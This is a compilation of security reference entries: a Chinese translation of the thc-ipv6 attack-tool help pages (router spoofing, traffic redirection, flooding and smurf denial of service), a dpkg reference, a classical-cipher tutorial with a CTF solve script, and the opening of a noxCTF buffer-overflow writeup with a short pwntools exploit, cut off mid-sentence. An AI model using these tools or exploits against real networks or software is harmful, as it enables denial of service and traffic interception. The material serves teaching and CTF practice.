使用-l选项来循环发送(以5秒为间隔),直到按下Control-C。 ``` ### fake_pim6 ``` root@kali:~# fake_pim6 fake_pim6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: fake_pim6 [-t ttl] [-s src6] [-d dst6] interface hello [dr_priority] fake_pim6 [-t ttl] [-s src6] [-d dst6] interface join | prune neighbor6 multicast6 target6 hello命令可选DR优先级(默认值:0)。 join和prune命令需要多播组来修改加入或离开邻近PIM路由器的目标地址。 使用-s来欺骗源ip6,-d发送到ff02::d以外的另一个地址,-t设置不同的TTL(默认值:1) ``` ### fake_router26 - 宣告自己为路由器,并尝试成为默认路由器 ``` root@kali:~# fake_router26 fake_router26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_router26 [-E type] [-A network/prefix] [-R network/prefix] [-D dns-server] [-s sourceip] [-S sourcemac] [-ardl seconds] [-Tt ms] [-n no] [-i interval] interface 选项: -A network/prefix 添加自动配置网络(最多16次) -a seconds -A前缀的有效生命周期(默认为99999) -R network/prefix 添加路由条目(最多16次) -r seconds -R路由条目生存期(默认为4096) -D dns-server 指定DNS服务器(最多16次) -L searchlist 指定DNS域搜索列表,用逗号分隔 -d seconds -D的dns条目生存期(默认为4096) -M mtu 要发送的MTU,默认为接口设置 -s sourceip 路由器的源IP,默认为本地连接 -S sourcemac 路由器的源MAC,默认为您的接口 -l seconds 路由器生命周期(默认为2048) -T ms 可达定时器(默认为0) -t ms 重发定时器(默认为0) -p priority 优先级"low"、"medium"、"high" (默认)、"reserved" -F flags 设置一个或多个以下标志:managed,other,homeagent, proxy, reserved; 用逗号分隔 -E type 路由器通告守护躲避选项。类型: H 简单的逐跳首部 1 简单的一次分片首部(可以添加多个) D 插入一个大的目标首部 O 重叠片段用于keep-first目标(Win,BSD,Mac) o 重叠片段用于keep-last目标(Linux,Solaris) 示例: -E H111, -E D -m mac-address 是否应当只有一台机器接收RA(不与-E DoO同用) -i interval RA包时间间隔(默认值:5) -n number 要发送的RA数量(默认:无限制) 宣告自己为路由器,并尝试成为默认路由器。 如果提供了不存在的本地链接或mac地址,则会导致DOS。 ``` ### fake_router6 - 宣告自己为路由器,并尝试成为默认路由器。 ``` root@kali:~# fake_router6 fake_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_router6 [-HFD] interface network-address / prefix-length [dns-server [router-ip-link-local [mtu [mac-address]]]] 宣告自己为路由器,并尝试成为默认路由器。 如果提供了不存在的本地链接或mac地址,则会导致DOS。 选项-H逐跳、-F分片首部、-D目标首部。 ``` ### fake_solicitate6 - 请求ipv6地址 ``` root@kali:~# fake_solicitate6 fake_solicitate6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_solicitate6 [-DHF] interface ip-address-solicitated [target-address [mac-address-solicitated [source-ip-address]]] 在网络上请求pv6地址,将其发送到全节点组播地址 ``` ### firewall6 - 执行各种ACL旁路来尝试检查实现 ``` root@kali:~# firewall6 firewall6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:firewall6 [-u] interface destination port [test-case-no] 执行各种ACL旁路来尝试检查实现。 默认用TCP端口,选项-u切换到UDP。 对于所有测试用例来说,必须允许ICMPv6 ping到目的地。 ``` ### flood_advertise6 - 用邻近公告洪泛本地网络 ``` root@kali:~# flood_advertise6 flood_advertise6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_advertise6 interface 用邻近公告洪泛本地网络。 ``` ### flood_dhcpc6 - DHCP洪泛客户端 ``` root@kali:~# flood_dhcpc6 flood_dhcpc6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_dhcpc6 [-n | -N] [-1] [-d] interface [domain-name] DHCP洪泛客户端。用于耗尽DHCP6服务器提供的IP地址池。 注意:如果地址池非常大,那这么做是无意义的。 :-) 默认情况下,本地链路IP和MAC地址是随机的,但是这在某些情况下将不起作用。选项-n将使用 真实MAC,-N使用真实MAC和本地链接地址。-1只会处置一个地址,但不请求它。 如果不使用-N,你应该同时运行parasite6。使用-d强制DNS更新,您可以在命令行中指定一个域名。 ``` ### flood_mld26 - 用MLDv2报告洪泛本地网络 ``` root@kali:~# flood_mld26 flood_mld26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_mld26接口 用MLDv2报告洪泛本地网络。 flood_mld6 - 用MLD报告洪泛本地网络 root @ kali:〜#flood_mld6 flood_mld6 v2.3(c)2013由van Hauser / THC <vh@thc.org> www.thc.org 语法:fflood_mld26 interface 用MLD报告洪泛本地网络。 ``` ### flood_mldrouter6 - 用MLD路由通告洪泛本地网络 ``` root@kali:~# flood_mldrouter6 flood_mldrouter6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_mldrouter6 interface 用MLD路由通告洪泛本地网络。 ``` ### flood_router26 - 用路由通告洪泛本地网络 ``` root@kali:~# flood_router26 flood_router26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_router26 [-HFD] [-s] [-RPA] interface 用路由通告来洪泛本地网络。每个数据包包含17个前缀和路由条目。 -F/-D/-H添加分片/目标/逐跳首部来绕过RA安全警戒。 -R只发送路由条目,没有前缀信息。-P只发送前缀信息,没有路由条目。 -A就像-P,但是实现了George Kargiotakis的攻击以禁用隐私扩展。 选项-s使用小的寿命值来造成更为严重的影响。 ``` ### flood_router6 - 用路由通告洪泛本地网络 ``` root@kali:~# flood_router6 flood_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: flood_router6 [-HFD] interface 用路由通告来洪泛本地网络。-F/-D/-H添加分片/目标/逐跳首部来绕过RA安全警戒。 ``` ### flood_solicitate6 - 用邻近请求洪泛网络 ``` root@kali:~# flood_solicitate6 flood_solicitate6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_solicitate6 interface [target] 用邻近请求洪泛网络。 ``` ### fragmentation6 - 执行片段防火墙和实现检查 ``` root@kali:~# fragmentation6 fragmentation6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fragmentation6 [-fp] [-n number] interface destination [test-case-no] -f激活洪泛模式,发送之间不会暂停; -p首先禁用、最终ping;-n指定每个测试执行的频率。 执行片段防火墙和实现检查,包括拒绝服务。 ``` ### fuzz_ip6 - 模糊icmp6数据包 ``` root@kali:~# fuzz_ip6 fuzz_ip6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: fuzz_ip6 [-x] [-t number | -T number] [-p number] [-IFSDHRJ] [-X|-1|-2|-3|-4|-5|-6|-7|-8|-9|-0 port] interface unicast-or-multicast-address [address-in-data-pkt] 模糊icmp6数据包。 选项: -X 不添加任何ICMP/TCP首部(传输层) -1 模糊ICMP6 echo请求(默认) -2 模糊ICMP6邻居请求 -3 模糊ICMP6邻近通告 -4 模糊ICMP6路由通告 -5 模糊组播监听报告报文 -6 模糊组播监听完成报文 -7 模糊组播监听查询报文 -8 模糊组播监听v2报告报文 -9 模糊组播监听v2查询报文 -0 模糊节点查询报文 -s port 模糊端口TCP-SYN报文 -x 尝试标志和字节类型的所有256个值 -t number 从第number号继续测试 -T number 只执行第number号测试 -p number 每number次测试执行一个活跃检查(默认:无) -a 不执行初始和最终的活跃测试 -n number 每个报文发送的次数(默认值:1) -I 模糊IP首部 -F 添加并模糊一次分片(对应选项1) -S 添加并模糊源路由(对应选项1) -D 添加并模糊目标首部(对应选项1) -H 添加并模糊逐跳首部(对应选项1和5-9) -R 添加并模糊路由器警报首部头(对应选项5-9和其它全部) -J 添加并模糊jumbo数据包首部(对应选项1) 您只能定义选项-0 ... -9和-s之一,默认为-1。 出错时返回-1,0目标活跃且测试完成,1目标崩溃。 ``` ### implementation6 - 执行一些ipv6实现检查 ``` root@kali:~# implementation6 implementation6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:implementation6 [-p] [-s sourceip6] interface destination [test-case-number] 选项: -s sourceip6 使用指定的源IPv6地址 -p 开始和结束时不执行活跃检查 执行一些ipv6实现检查,也可以用来测试一些防火墙功能。接近2分钟即可完成 ``` ### implementation6d - 通过implementation6工具验证测试包 ``` root@kali:~# implementation6d implementation6d v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:implementation6d interface 通过implementation6工具验证测试包,对检查什么数据包能通过防火墙很有用 ``` ### inject_alive6 - 此工具用于在PPPoE和6in4隧道上的keep-alive请求 ``` root@kali:~# inject_alive6 inject_alive6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: inject_alive6 [-ap] interface 此工具可解答PPPoE和6in4隧道上的keep-alive请求;对于PPPoE它还发送keep-alive请求。 请注意,必须设置适当的环境变量THC_IPV6_ {PPPOE|6IN4}。 选项-a将每15秒主动发送keep-alive请求,-p不会发送对请求的回复。 ``` ### inverse_lookup6 - 执行反向地址查询 ``` root@kali:~# inverse_lookup6 inverse_lookup6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: inverse_lookup6 interface mac-address 执行反向地址查询,获取分配到MAC地址的IPv6地址。 请注意,只有少数系统支持这一点。 ``` ### kill_router6 - 宣告路由器将把一个目标从路由表中删除 ``` root@kali:~# kill_router6 kill_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:kill_router6 [-HFD] interface router-address [srcmac [dstmac]] 宣告路由器将把一个目标从路由表中删除。如果您提供“*”作为路由器地址,则此工具将嗅探任何网络 RA数据包并立即发送kill数据包。 选项-H添加逐跳首部,-F分片首部,-D目标首部。 ``` ### ndpexhaust26 - 用ICMPv6 TooBig错误消息洪泛目标/64网络 ``` root@kali:~# ndpexhaust26 ndpexhaust26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: ndpexhaust26 [-acpPTUrR] [-s sourceip6] interface target-network 选项: -a 添加一个带路由器警报的逐跳首部 -c 不计算校验和以节省时间 -p 发送ICMPv6回显请求 -P 发送ICMPv6回显应答 -T 发送ICMPv6生存时间 -U 发送ICMPv6不可达(无路由) -r 从您的/64前缀将源随机化 -R 将源完全随机化 -s sourceip6 使用此作为源ipv6地址 用ICMPv6 TooBig错误消息洪泛目标/64网络。 这个工具版本比ndpexhaust6更有效。 ``` ### ndpexhaust6 - 用ICMPv6 TooBig错误消息洪泛目标/64网络 ``` root@kali:~# ndpexhaust6 ndpexhaust6 by mario fleischmann <mario.fleischmann@1und1.de> 语法: ndpexhaust6 interface destination-network [sourceip] 在目标网络中随机ping IP ``` ### node_query6 - 向目标发送ICMPv6节点查询请求 ``` root@kali:~# node_query6 node_query6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: node_query6 interface target 向目标发送ICMPv6节点查询请求并转储应答。 ``` ### parasite6 - 这是IPv6的“ARP spoofer” ``` root@kali:~# parasite6 parasite6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:parasite6 [-lRFHD] interface [fake-mac] 这是IPv6的“ARP spoofer”,通过对Neighbor Solitication请求的误导应答, 将所有本地流量重定向到您自己的系统(或虚假的,如果假冒mac不存在)。 选项-l循环并每5秒对每个目标重新发送数据包,-R也将尝试注入请求的目标。 NS安全规避:-F片段,-H逐跳,-D大的目标首部 ``` ### passive_discovery6 - 被动地嗅探网络并转储所有客户端的IPv6地址 ``` root@kali:~# passive_discovery6 passive_discovery6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:passive_discovery6 [-Ds] [-m maxhop] [-R prefix] interface [script] 选项: -D 转储目标地址(不适用于-m) -s 只打印地址,没有其他输出 -m maxhop 被转储的目标的最大跳数。0表示仅限本地,最大限度通常为5 -R prefix 将定义的前缀与本地链路前缀进行交换 被动嗅探网络并转储检测到的所有客户端IPv6地址。 请注意,在运行parasite6的环境中能获得更好的结果,但这会影响网络。 如果在接口后面指定了一个脚本名称,它将首先被用于检测到的ipv6地址,然后是接口。 ``` ### randicmp6 - 将所有ICMPv6类型和代码组合发送到目标 ``` root@kali:~# randicmp6 Syntax: randicmp6 [-s sourceip] interface destination [type [code]] 将所有ICMPv6类型和代码组合发送到目标。选项-s设置源ipv6地址。 ``` ### redir6 - 植入路由,将所有到target-ip的流量重定向到victim-ip ``` root@kali:~# redir6 redir6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:redir6 interface victim-ip target-ip original-router new-router [new-router-mac] [hop-limit] 将一条路由植入victim-ip,将到target-ip的所有流量重定向到新ip。您必须知道将处理路由的路由器。 如果new-router-mac不存在,则会导致DOS。如果目标的TTL不是64,则将此指定为最后一个选项。 ``` ### redirsniff6 - 植入路由,将所有到destination-ip的流量重定向到victim-ip ``` root@kali:~# redirsniff6 redirsniff6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:redirsniff6 interface victim-ip destination-ip original-router [new-router [new-router-mac]] 将路由插入victim-ip,将所有到destination-ip的流量重定向到新路由器。这通过修改 匹配victim->target的所有流量来完成。您必须知道将处理路由的路由器。 如果新路由器或mac不存在,则会导致DOS。 您可以为victim-ip和/或destination-ip提供通配符('*')。 ``` ### rsmurf6 - 攻击victim的本地网络 ``` root@kali:~# rsmurf6 rsmurf6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:rsmurf6 interface victim-ip 攻击victim的本地网络。注意:这取决于一个实现上的错误,目前只在Linux上验证过。 邪恶:将“ff02: 1”作为victim将彻底DOS你的本地局域网。 ``` ### sendpees6 - 发送SEND邻近请求消息 ``` root@kali:~# sendpees6 sendpees6 by willdamn <willdamn@gmail.com> 用法: sendpees6 <inf> <key_length> <prefix> <victim> 发送SEND邻近请求消息,使目标验证一个lota CGA和RSA签名 ``` ### sendpeesmp6 - 发送SEND邻居请求消息 ``` root@kali:~# sendpeesmp6 原始sendpees作者willdamn <willdamn@gmail.com> 修改的sendpeesMP作者Marcin Pohl <marcinpohl@gmail.com> 基于thc-ipv6的代码 用法:sendpeesmp6 <inferface> <key_length> <prefix> <victim> 发送SEND邻近请求消息,并使目标验证一个lota CGA和RSA签名 示例:sendpeesmp6 eth0 2048 fe80:: fe80::1 ``` ### smurf6 - 用icmp echo应答攻击目标 ``` root@kali:~# smurf6 smurf6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:smurf6 interface victim-ip [multicast-network-address] 用icmp echo应答攻击目标。如果未指定,echo请求的目标是本地全节点组播地址。 ``` ### thcping6 - 制作您的特殊icmpv6 echo请求包 ``` root@kali:~# thcping6 thcping6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: thcping6 [-af] [-H o:s:v] [-D o:s:v] [-F dst] [-t ttl] [-c class] [-l label] [-d size] [-S port|-U port] interface src6 dst6 [srcmac [dstmac [data]]] 制作您的特殊icmpv6 echo请求数据包。您可以在src6、srcmac和dstmac中输入“x”作为自动值。 选项: -a 添加带有路由警报的逐跳首部 -q 添加带有quickstart的逐跳首部 -E 以以太网IPv4的形式发送 -H o:s:v 添加具有特殊内容的逐跳首部 -D o:s:v 添加具有特殊内容的目标首部 -D “xxx” 添加一个能导致分片的大的目标首部 -f 添加一个一次分片首部 -F ipv6address 使用源路由到最终目标 -t ttl 指定TTL(默认值:64) -c class 指定一个类(0-4095) -l label 指定标签(0-1048575) -d data_size 定义ping数据缓冲区的大小 -S port 在定义的端口上使用TCP SYN数据包,而不是ping -U port 在定义的端口上使用UDP数据包,而不是ping o:s:v语法:选项号:大小:值,值为十六进制,例如1:2:feab 出错或无应答时返回-1,0正常,1错误应答。 ``` ### thcsyn6 - 使用TCP-SYN数据包泛洪目标端口 ``` root@kali:~# thcsyn6 thcsyn6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: thcsyn6 [-AcDrRS] [-p port] [-s sourceip6] interface target port 选项: -A 发送TCP-ACK数据包 -S 发送TCP-SYN-ACK数据包 -r 通过您的/64前缀随机化源 -R 将源完全随机化 -s sourceip6 使用此作为源ipv6地址 -D 随机化目标(视为/64) -p port 使用固定源端口 用TCP-SYN数据包泛洪目标端口。如果你提供“x”作为端口,那么是随机的 ``` ### toobig6 - 在目标上植入指定的mtu ``` root@kali:~# toobig6 toobig6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:toobig6 [-u] interface target-ip existing-ip mtu [hop-limit] 在目标上植入指定的mtu。如果目标的TTL不是64,则应指定为最后一个选项。 选项-u将发送TooBig,而不会从现有的ip发出欺骗ping6。 ``` ### trace6 - 一个基本但非常快的traceroute6程序 ``` root@kali:~# trace6 trace6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:trace6 [-abdt] [-s src6] interface targetaddress [port] 选项: -a 插入带有路由警报的逐跳首部 -D 插入目标扩展首部 -E 插入带有无效选项的目标扩展首部 -F 插入一次分片首部 -b 使用TooBig(你将看不到目标),而不是ICMP6 Ping -B 使用PingReply(你将看不到目标),而不是ICMP6 Ping -d 解析IPv6地址 -t 启用隧道检测 -s src6 指定源IPv6地址 最大跳数可达31 一个基本但非常快的traceroute6程序。如果没有指定端口,则使用ICMP6 Ping请求, 否则对指定的端口使用TCP SYN数据包。选项D、E和F可以多次使用。 ``` ## address6用法示例 将IPv6地址转换为MAC地址或相反: ``` root@kali:~# address6 fe80::76d4:35ff:fe4e:39c8 74:d4:35:4e:39:c8 root@kali:~# address6 74:d4:35:4e:39:c8 fe80::76d4:35ff:fe4e:39c8 ``` ## alive6用法示例 ``` root@kali:~# alive6 eth0 Alive: fd77:7c68:420a:1:426c:8fff:fe1b:cb90 [ICMP parameter problem] Alive: fd77:7c68:420a:1:20c:29ff:fee5:5bf4 [ICMP echo-reply] Alive: fd77:7c68:420a:1:75d9:4f39:a46a:6f83 [ICMP echo-reply] Alive: fd77:7c68:420a:1:6912:8e80:e02f:1969 [ICMP echo-reply] Alive: fd77:7c68:420a:1:201:6cff:fe6f:ddd1 [ICMP echo-reply] ``` ## detect-new-ip6用法示例 ``` root@kali:~# detect-new-ip6 eth0 Started ICMP6 DAD detection (Press Control-C to end) ... Detected new ip6 address: fe80::85d:9879:9251:853a ``` ## dnsdict6用法示例 ``` root@kali:~# dnsdict6 example.com Starting DNS enumeration work on example.com. ... Starting enumerating example.com. - creating 8 threads for 798 words... Estimated time to completion: 1 to 2 minutes www.example.com. => 2606:2800:220:6d:26bf:1447:1097:aa7 ``` 原文链接:[http://tools.kali.org/information-gathering/thc-ipv6](http://tools.kali.org/information-gathering/thc-ipv6)
sec-knowleage
dpkg === Debian Linux系统上安装、创建和管理软件包 ## 补充说明 **dpkg命令** 是Debian Linux系统用来安装、创建和管理软件包的实用工具。 ### 语法 ```shell dpkg(选项)(参数) ``` ### 选项 ```shell -i:安装软件包; -r:删除软件包; -P:删除软件包的同时删除其配置文件; -L:显示于软件包关联的文件; -l:显示已安装软件包列表; --unpack:解开软件包; -c:显示软件包内文件列表; --confiugre:配置软件包。 ``` ### 参数 Deb软件包:指定要操作的.deb软件包。 ### 实例 ```shell dpkg -i package.deb # 安装包 dpkg -r package # 删除包 dpkg -P package # 删除包(包括配置文件) dpkg -L package # 列出与该包关联的文件 dpkg -l package # 显示该包的版本 dpkg --unpack package.deb # 解开deb包的内容 dpkg -S keyword # 搜索所属的包内容 dpkg -l # 列出当前已安装的包 dpkg -c package.deb # 列出deb包的内容 dpkg --configure package # 配置包 ```
sec-knowleage
# 单表代换加密 ## 通用特点 在单表替换加密中,所有的加密方式几乎都有一个共性,那就是明密文一一对应。所以说,一般有以下两种方式来进行破解 - 在密钥空间较小的情况下,采用暴力破解方式 - 在密文长度足够长的时候,使用词频分析,http://quipqiup.com/ 当密钥空间足够大,而密文长度足够短的情况下,破解较为困难。 ## 凯撒密码 ### 原理 凯撒密码(Caesar)加密时会将明文中的 **每个字母** 都按照其在字母表中的顺序向后(或向前)移动固定数目(**循环移动**)作为密文。例如,当偏移量是左移 3 的时候(解密时的密钥就是 3): ``` 明文字母表:ABCDEFGHIJKLMNOPQRSTUVWXYZ 密文字母表:DEFGHIJKLMNOPQRSTUVWXYZABC ``` 使用时,加密者查找明文字母表中需要加密的消息中的每一个字母所在位置,并且写下密文字母表中对应的字母。需要解密的人则根据事先已知的密钥反过来操作,得到原来的明文。例如: ``` 明文:THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 密文:WKH TXLFN EURZQ IRA MXPSV RYHU WKH ODCB GRJ ``` 根据偏移量的不同,还存在**若干特定的恺撒密码名称**: - 偏移量为 10:Avocat (A→K) - 偏移量为 13:[ROT13](https://zh.wikipedia.org/wiki/ROT13) - 偏移量为 -5:Cassis (K 6) - 偏移量为 -6:Cassette (K 7) 此外,还有还有一种基于密钥的凯撒密码 Keyed Caesar。其基本原理是 **利用一个密钥,将密钥的每一位转换为数字(一般转化为字母表对应顺序的数字),分别以这一数字为密钥加密明文的每一位字母。** 这里以 **XMan 一期夏令营分享赛宫保鸡丁队 Crypto 100** 为例进行介绍。 ``` 密文:s0a6u3u1s0bv1a 密钥:guangtou 偏移:6,20,0,13,6,19,14,20 明文:y0u6u3h1y0uj1u ``` ### 破解 对于不带密钥的凯撒密码来说,其基本的破解方法有两种方式 1. 遍历 26 个偏移量,适用于普遍情况 2. 利用词频分析,适用于密文较长的情况。 其中,第一种方式肯定可以得到明文,而第二种方式则不一定可以得到正确的明文。 而对于基于密钥的凯撒密码来说,一般来说必须知道对应的密钥。 ### 工具 一般我们有如下的工具,其中JPK比较通用。 - JPK,可解带密钥与不带密钥 - http://planetcalc.com/1434/ - http://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php ## 移位密码 与凯撒密码类似,区别在于移位密码不仅会处理字母,还会处理数字和特殊字符,常用 ASCII 码表进行移位。其破解方法也是遍历所有的可能性来得到可能的结果。 ## Atbash Cipher ### 原理 埃特巴什码(Atbash Cipher)其实可以视为下面要介绍的简单替换密码的特例,它使用字母表中的最后一个字母代表第一个字母,倒数第二个字母代表第二个字母。在罗马字母表中,它是这样出现的: ``` 明文:A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 密文:Z Y X W V U T S R Q P O N M L K J I H G F E D C B A ``` 下面给出一个例子: ``` 明文:the quick brown fox jumps over the lazy dog 密文:gsv jfrxp yildm ulc qfnkh levi gsv ozab wlt ``` ### 破解 可以看出其密钥空间足够短,同时当密文足够长时,仍然可以采用词频分析的方法解决。 ### 工具 - http://www.practicalcryptography.com/ciphers/classical-era/atbash-cipher/ ## 简单替换密码 ### 原理 简单替换密码(Simple Substitution Cipher)加密时,将每个明文字母替换为与之唯一对应且不同的字母。它与恺撒密码之间的区别是其密码字母表的字母不是简单的移位,而是完全是混乱的,这也使得其破解难度要高于凯撒密码。 比如: ``` 明文字母 : abcdefghijklmnopqrstuvwxyz 密钥字母 : phqgiumeaylnofdxjkrcvstzwb ``` a 对应 p,d 对应 h,以此类推。 ``` 明文:the quick brown fox jumps over the lazy dog 密文:cei jvaql hkdtf udz yvoxr dsik cei npbw gdm ``` 而解密时,我们一般是知道了每一个字母的对应规则,才可以正常解密。 ### 破解 由于这种加密方式导致其所有的密钥个数是$26!$ ,所以几乎上不可能使用暴力的解决方式。所以我们 一般采用词频分析。 ### 工具 - http://quipqiup.com/ ## 仿射密码 ### 原理 仿射密码的加密函数是 $E(x)=(ax+b)\pmod m$,其中 - $x$ 表示明文按照某种编码得到的数字 - $a$ 和 $m$ 互质 - $m$ 是编码系统中字母的数目。 解密函数是 $D(x)=a^{-1}(x-b)\pmod m$,其中 $a^{-1}$ 是 $a$ 在 $\mathbb{Z}_{m}$ 群的乘法逆元。 下面我们以 $E(x) = (5x + 8) \bmod 26$ 函数为例子进行介绍,加密字符串为 `AFFINE CIPHER`,这里我们直接采用字母表26个字母作为编码系统 | 明文 | A | F | F | I | N | E | C | I | P | H | E | R | | --------- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | | x | 0 | 5 | 5 | 8 | 13 | 4 | 2 | 8 | 15 | 7 | 4 | 17 | | $y=5x+8$ | 8 | 33 | 33 | 48 | 73 | 28 | 18 | 48 | 83 | 43 | 28 | 93 | | $y\mod26$ | 8 | 7 | 7 | 22 | 21 | 2 | 18 | 22 | 5 | 17 | 2 | 15 | | 密文 | I | H | H | W | V | C | S | W | F | R | C | P | 其对应的加密结果是 `IHHWVCSWFRCP`。 对于解密过程,正常解密者具有a与b,可以计算得到 $a^{-1}$ 为 21,所以其解密函数是$D(x)=21(x-8)\pmod {26}$ ,解密如下 | 密文 | I | H | H | W | V | C | S | W | F | R | C | P | | ----------- | :--- | :--- | --- | --- | --- | ---- | --- | --- | --- | --- | ---- | --- | | $y$ | 8 | 7 | 7 | 22 | 21 | 2 | 18 | 22 | 5 | 17 | 2 | 15 | | $x=21(y-8)$ | 0 | -21 | -21 | 294 | 273 | -126 | 210 | 294 | -63 | 189 | -126 | 147 | | $x\mod26$ | 0 | 5 | 5 | 8 | 13 | 4 | 2 | 8 | 15 | 7 | 4 | 17 | | 明文 | A | F | F | I | N | E | C | I | P | H | E | R | 可以看出其特点在于只有 26 个英文字母。 ### 破解 首先,我们可以看到的是,仿射密码对于任意两个不同的字母,其最后得到的密文必然不一样,所以其也具有最通用的特点。当密文长度足够长时,我们可以使用频率分析的方法来解决。 其次,我们可以考虑如何攻击该密码。可以看出当$a=1$ 时,仿射加密是凯撒加密。而一般来说,我们利用仿射密码时,其字符集都用的是字母表,一般只有26个字母,而不大于26的与26互素的个数一共有 $$ \phi(26)=\phi(2) \times \phi(13) = 12 $$ 算上b的偏移可能,一共有可能的密钥空间大小也就是 $$ 12 \times 26 = 312 $$ 一般来说,对于该种密码,我们至少得是在已知部分明文的情况下才可以攻击。下面进行简单的分析。 这种密码由两种参数来控制,如果我们知道其中任意一个参数,那我们便可以很容易地快速枚举另外一个参数得到答案。 但是,假设我们已经知道采用的字母集,这里假设为26个字母,我们还有另外一种解密方式,我们只需要知道两个加密后的字母 $y_1,y_2$ 即可进行解密。那么我们还可以知道 $$ y_1=(ax_1+b)\pmod{26} \\ y_2=(ax_2+b)\pmod{26} $$ 两式相减,可得 $$ y_1-y_2=a(x_1-x_2)\pmod{26} $$ 这里 $y_1,y_2$ 已知,如果我们知道密文对应的两个不一样的字符 $x_1$ 与 $x_2$ ,那么我们就可以很容易得到 $a$ ,进而就可以得到 $b$ 了。 ### 例子 这里我们以TWCTF 2016 的 super_express为例进行介绍。简单看一下给的源码 ```python import sys key = '****CENSORED***************' flag = 'TWCTF{*******CENSORED********}' if len(key) % 2 == 1: print("Key Length Error") sys.exit(1) n = len(key) / 2 encrypted = '' for c in flag: c = ord(c) for a, b in zip(key[0:n], key[n:2*n]): c = (ord(a) * c + ord(b)) % 251 encrypted += '%02x' % c print encrypted ``` 可以发现,虽然对于 flag 中的每个字母都加密了 n 次,如果我们仔细分析的话,我们可以发现 $$ \begin{align*} c_1&=a_1c+b_1 \\ c_2&=a_2c_1+b_2 \\ &=a_1a_2c+a_2b_1+b_2 \\ &=kc+d \end{align*} $$ 根据第二行的推导,我们可以得到其实 $c_n$ 也是这样的形式,可以看成 $c_n=xc+y$ ,并且,我们可以知道的是,key 是始终不变化的,所以说,其实这个就是仿射密码。 此外,题目中还给出了密文以及部分部分密文对应的明文,那么我们就很容易利用已知明文攻击的方法来攻击了,利用代码如下 ```python import gmpy key = '****CENSORED****************' flag = 'TWCTF{*******CENSORED********}' f = open('encrypted', 'r') data = f.read().strip('\n') encrypted = [int(data[i:i + 2], 16) for i in range(0, len(data), 2)] plaindelta = ord(flag[1]) - ord(flag[0]) cipherdalte = encrypted[1] - encrypted[0] a = gmpy.invert(plaindelta, 251) * cipherdalte % 251 b = (encrypted[0] - a * ord(flag[0])) % 251 a_inv = gmpy.invert(a, 251) result = "" for c in encrypted: result += chr((c - b) * a_inv % 251) print result ``` 结果如下 ```shell ➜ TWCTF2016-super_express git:(master) ✗ python exploit.py TWCTF{Faster_Than_Shinkansen!} ```
sec-knowleage
# Writeup - noxCTF - The Name Calculator ("Pwn" Category) ## Instructions: You can calculate almost everything, why not calculate names? nc chal.noxale.com 5678 *[A binary file was attached as well]* ## Solution: We connect to the supplied address and receive the following output: ```console $ nc chal.noxale.com 5678 What is your name? ``` We can then enter text, and the response is: ```console $ nc chal.noxale.com 5678 What is your name? Fake Name I've heard better ``` Let's take a look at the assembly: ![](images/image004.png) The program reads up to 0x20 (32) bytes of the the user input into the `input` buffer, then compares a different buffer (`magic_number`) to a magic value (0x6A4B825) and if they are equal, jumps to the `secretFunc`. Otherwise, we get the standard output ("I've heard better"). What's the relation between `input` and `magic_number`? ``` input= byte ptr -2Ch magic_number= dword ptr -10h var_C= dword ptr -0Ch argc= dword ptr 8 argv= dword ptr 0Ch envp= dword ptr 10h ``` So `input` is 0x2C - 0x10 = 28 bytes long, and `magic_number` is another 4 bytes long - exactly enough to easily overflow `input` when reading the input from the user. Therefore, our exploit so far will be: ```python from pwn import * MAGIC_VALUE = 0x6A4B825 p = process("./TheNameCalculator") p.recvuntil("name?") p.send("A" * 28 + p32(MAGIC_VALUE)) p.interactive() ``` And running it produces: ```console root@kali:/media/sf_CTFs/noxale/name_calc# python exploit.py [+] Starting local process './TheNameCalculator': pid 30144 [*] Switching to interactive mode Say that again please $ ``` At this point, we can enter another string. The output, for example, will be: ```console Say that again please $ Fake Name Your name was encrypted using the best encryption in the world This is your new name: \x15sS\x16x\x04I: [*] Process './TheNameCalculator' stopped with exit code 0 (pid 30144) [*] Got EOF while reading in interactive ``` The next step would be to analyze 